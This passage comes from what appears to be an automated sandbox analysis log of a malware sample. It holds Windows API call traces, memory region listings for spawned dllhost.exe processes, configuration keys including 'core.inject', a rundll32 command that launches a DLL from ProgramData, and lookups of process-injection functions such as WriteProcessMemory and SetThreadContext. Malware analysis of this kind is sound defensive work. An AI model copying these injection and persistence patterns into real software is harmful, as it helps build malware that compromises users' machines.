lpOverlapped=0x262129c) returned 1 [0089.413] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x7530) returned 0x0 [0089.421] CloseHandle (hObject=0x2a4) returned 1 [0089.421] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.421] CloseHandle (hObject=0x2e4) returned 1 [0089.421] strlen (_Str="core.crash_handler") returned 0x12 [0089.421] strlen (_Str="core") returned 0x4 [0089.421] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x26212d4) returned 1 [0089.421] WaitForSingleObject (hHandle=0x2a4, dwMilliseconds=0x7530) returned 0x0 [0089.462] CloseHandle (hObject=0x2a4) returned 1 [0089.462] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.478] CloseHandle (hObject=0x2e4) returned 1 [0089.478] strlen (_Str="core.inject") returned 0xb [0089.479] strlen (_Str="core") returned 0x4 [0089.479] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x262122c) returned 1 [0089.483] WaitForSingleObject (hHandle=0x300, dwMilliseconds=0x7530) returned 0x0 [0089.485] CloseHandle (hObject=0x300) returned 1 [0089.486] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.486] CloseHandle (hObject=0x2e4) returned 1 [0089.486] wcslen (_String="rundll32.exe \"C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll\",Main event1") returned 0x77 [0089.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rundll32.exe \"C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll\",Main event1", cchWideChar=119, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 119 [0089.486] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rundll32.exe \"C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll\",Main event1", cchWideChar=119, lpMultiByteStr=0x26238a8, cbMultiByte=119, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rundll32.exe \"C:\\ProgramData\\252e9d6f-46f0-4cf5-8686-f2a673c579a2\\af77746e-8a65-4302-8042-f6017918c669.dll\",Main event1", lpUsedDefaultChar=0x0) returned 119 [0089.486] strlen (_Str="core.restart_cmd") returned 0x10 [0089.486] strlen (_Str="core") returned 0x4 [0089.486] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x26211bc) returned 1 [0089.509] WaitForSingleObject (hHandle=0x300, dwMilliseconds=0x7530) returned 0x0 [0089.509] CloseHandle (hObject=0x300) returned 1 [0089.510] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.535] CloseHandle (hObject=0x2e4) returned 1 [0089.535] wcslen (_String="407dad5a-b5c6-4985-9878-a37532f9a55f") returned 0x24 [0089.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="407dad5a-b5c6-4985-9878-a37532f9a55f", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0089.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="407dad5a-b5c6-4985-9878-a37532f9a55f", cchWideChar=36, lpMultiByteStr=0x2644248, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="407dad5a-b5c6-4985-9878-a37532f9a55f", lpUsedDefaultChar=0x0) returned 36 [0089.535] strlen (_Str="core.task_name") returned 0xe [0089.535] strlen (_Str="core") returned 0x4 [0089.535] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x26211f4) returned 1 [0089.538] WaitForSingleObject (hHandle=0x2fc, dwMilliseconds=0x7530) returned 0x0 [0089.541] CloseHandle (hObject=0x2fc) returned 1 [0089.541] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.541] CloseHandle (hObject=0x2e4) returned 1 [0089.542] strlen (_Str="core") returned 0x4 [0089.542] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x262114c) returned 1 [0089.543] WaitForSingleObject (hHandle=0x2fc, dwMilliseconds=0x7530) returned 0x0 [0089.543] CloseHandle (hObject=0x2fc) returned 1 [0089.543] WaitForSingleObject (hHandle=0x2e4, dwMilliseconds=0xffffffff) returned 0x0 [0089.543] CloseHandle (hObject=0x2e4) returned 1 [0089.543] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.543] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.543] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.543] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.544] WaitForSingleObject (hHandle=0x244, dwMilliseconds=0xffffffff) returned 0x0 [0089.776] WaitForSingleObject (hHandle=0x24c, dwMilliseconds=0x0) returned 0x102 [0089.776] GetCurrentThreadId () returned 0x834 [0089.777] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e4 [0089.777] strlen (_Str="core") returned 0x4 [0089.777] PostQueuedCompletionStatus (CompletionPort=0x278, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2621184) Process: id = "4" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0x29fc5000" os_pid = "0x474" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xaa8" cmd_line = "\"C:\\Windows\\system32\\dllhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 707 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 708 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 709 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 710 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 711 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 712 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 713 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 714 start_va = 0xab0000 end_va = 0xab4fff entry_point = 0xab0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 715 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 716 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 717 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 718 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 719 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 720 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 721 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 722 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 723 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 724 start_va = 0x70000 end_va = 0xe5fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Thread: id = 47 os_tid = 0x5d4 Process: id = "5" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0x29144000" os_pid = "0x4bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xaa8" cmd_line = "\"C:\\Windows\\system32\\dllhost.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 728 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 729 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 730 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 731 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 732 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 733 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 734 start_va = 0xab0000 end_va = 0xab4fff entry_point = 0xab1609 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 735 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 736 start_va = 0x76f70000 end_va = 0x770effff entry_point = 0x76f70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 737 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 738 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 739 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 740 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 741 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 742 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 743 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 744 start_va = 0x150000 end_va = 0x1c5fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 745 start_va = 0x3a0000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 746 start_va = 0x744a0000 end_va = 0x744a7fff entry_point = 0x744a20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 747 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744ef798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 748 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x7453de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 749 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 750 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 751 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 752 start_va = 0x1d0000 end_va = 0x236fff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 753 start_va = 0x5f0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 754 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 755 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x766132d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 756 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 757 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 758 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 759 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74aea3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 760 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74cbb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 761 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 762 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e84975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 763 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74eb49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 764 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ef0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 765 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x76406343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 766 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76543fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 767 start_va = 0x76710000 end_va = 0x7686bfff entry_point = 0x7675ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 768 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a4a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 769 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 770 start_va = 0x6f0000 end_va = 0x877fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 771 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b4158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 772 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 773 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 774 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 775 start_va = 0x880000 end_va = 0xa00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 776 start_va = 0xac0000 end_va = 0x1ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 777 start_va = 0x760d0000 end_va = 0x761ecfff entry_point = 0x760d158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 778 start_va = 0x76f40000 end_va = 0x76f4bfff entry_point = 0x76f4238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 779 start_va = 0x762f0000 end_va = 0x76324fff entry_point = 0x762f145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 780 start_va = 0x75fd0000 end_va = 0x75fd5fff entry_point = 0x75fd1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 781 start_va = 0x240000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 782 start_va = 0x743a0000 end_va = 0x743e3fff entry_point = 0x743b63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 783 start_va = 0x420000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 784 start_va = 0x74c90000 end_va = 0x74c94fff entry_point = 0x74c91438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 785 start_va = 0x74f40000 end_va = 0x75b89fff entry_point = 0x74fc1601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 786 start_va = 0x76070000 end_va = 0x760c6fff entry_point = 0x76089ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 787 start_va = 0x74340000 end_va = 0x74397fff entry_point = 0x743413b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 788 start_va = 0x742f0000 end_va = 0x7433efff entry_point = 0x742f1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 789 start_va = 0x74160000 end_va = 0x742effff entry_point = 0x741fd026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 790 start_va = 0x74140000 end_va = 0x74150fff entry_point = 0x74141300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 791 start_va = 0x745b0000 end_va = 0x745b8fff entry_point = 0x745b15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 792 start_va = 0x74120000 end_va = 0x74138fff entry_point = 0x74121319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 793 start_va = 0x745d0000 end_va = 0x745defff entry_point = 0x745d12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Thread: id = 48 os_tid = 0x244 [0089.583] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76600000 [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="DecodePointer") returned 0x76fa9d35 [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="VirtualQuery") returned 0x7661445a [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="FlushFileBuffers") returned 0x7661469b [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="CopyFileW") returned 0x7663830d [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="Sleep") returned 0x766110ff [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="GetShortPathNameW") returned 0x7661d2f9 [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="GetCommandLineW") returned 0x76615223 [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="OpenEventW") returned 0x766115d6 [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="SetErrorMode") returned 0x76611b00 [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="DuplicateHandle") returned 0x76611886 [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleFileNameW") returned 0x76614950 [0089.584] GetProcAddress (hModule=0x76600000, lpProcName="CreateProcessW") returned 0x7661103d [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="RemoveDirectoryW") returned 0x766944cf [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="OpenMutexA") returned 0x7662ec6f [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="GetComputerNameW") returned 0x7661dd0e [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemDirectoryW") returned 0x76615063 [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="ResumeThread") returned 0x766143ef [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="CreateEventA") returned 0x7661328c [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="GetEnvironmentVariableW") returned 0x76611b48 [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="CreateMutexA") returned 0x76614c6b [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="FindFirstFileW") returned 0x76614435 [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="FindNextFileW") returned 0x766154ee [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="FindClose") returned 0x76614442 [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="RegisterWaitForSingleObject") returned 0x7663cb05 [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="UnregisterWaitEx") returned 0x7663b921 [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="CreateToolhelp32Snapshot") returned 0x7663735f [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="Process32FirstW") returned 0x76638baf [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="Process32NextW") returned 0x7663896c [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="UnregisterWait") returned 0x7669e6ab [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="CancelIo") returned 0x7668bce9 [0089.585] GetProcAddress (hModule=0x76600000, lpProcName="LocalFree") returned 0x76612d3c [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="GetTempPathW") returned 0x7662d4dc [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="GetTempFileNameW") returned 0x7663d1b6 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAlloc") returned 0x76611856 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="VirtualFree") returned 0x7661186e [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAllocEx") returned 0x7662d9b0 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="WriteProcessMemory") returned 0x7662d9e0 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="GetThreadContext") returned 0x766379d4 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadContext") returned 0x76695393 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="VirtualFreeEx") returned 0x7662d9c8 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="GetProcAddress") returned 0x76611222 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcess") returned 0x76611809 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="GetProcessId") returned 0x7663cf04 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileA") returned 0x766153c6 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="TlsGetValue") returned 0x766111e0 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="TlsAlloc") returned 0x766149ad [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="TlsFree") returned 0x76613587 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="CreateIoCompletionPort") returned 0x7662eef2 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="PostQueuedCompletionStatus") returned 0x7662ef29 [0089.586] GetProcAddress (hModule=0x76600000, lpProcName="TerminateProcess") returned 0x7662d802 [0089.587] GetProcAddress (hModule=0x76600000, lpProcName="TlsSetValue") returned 0x766114fb 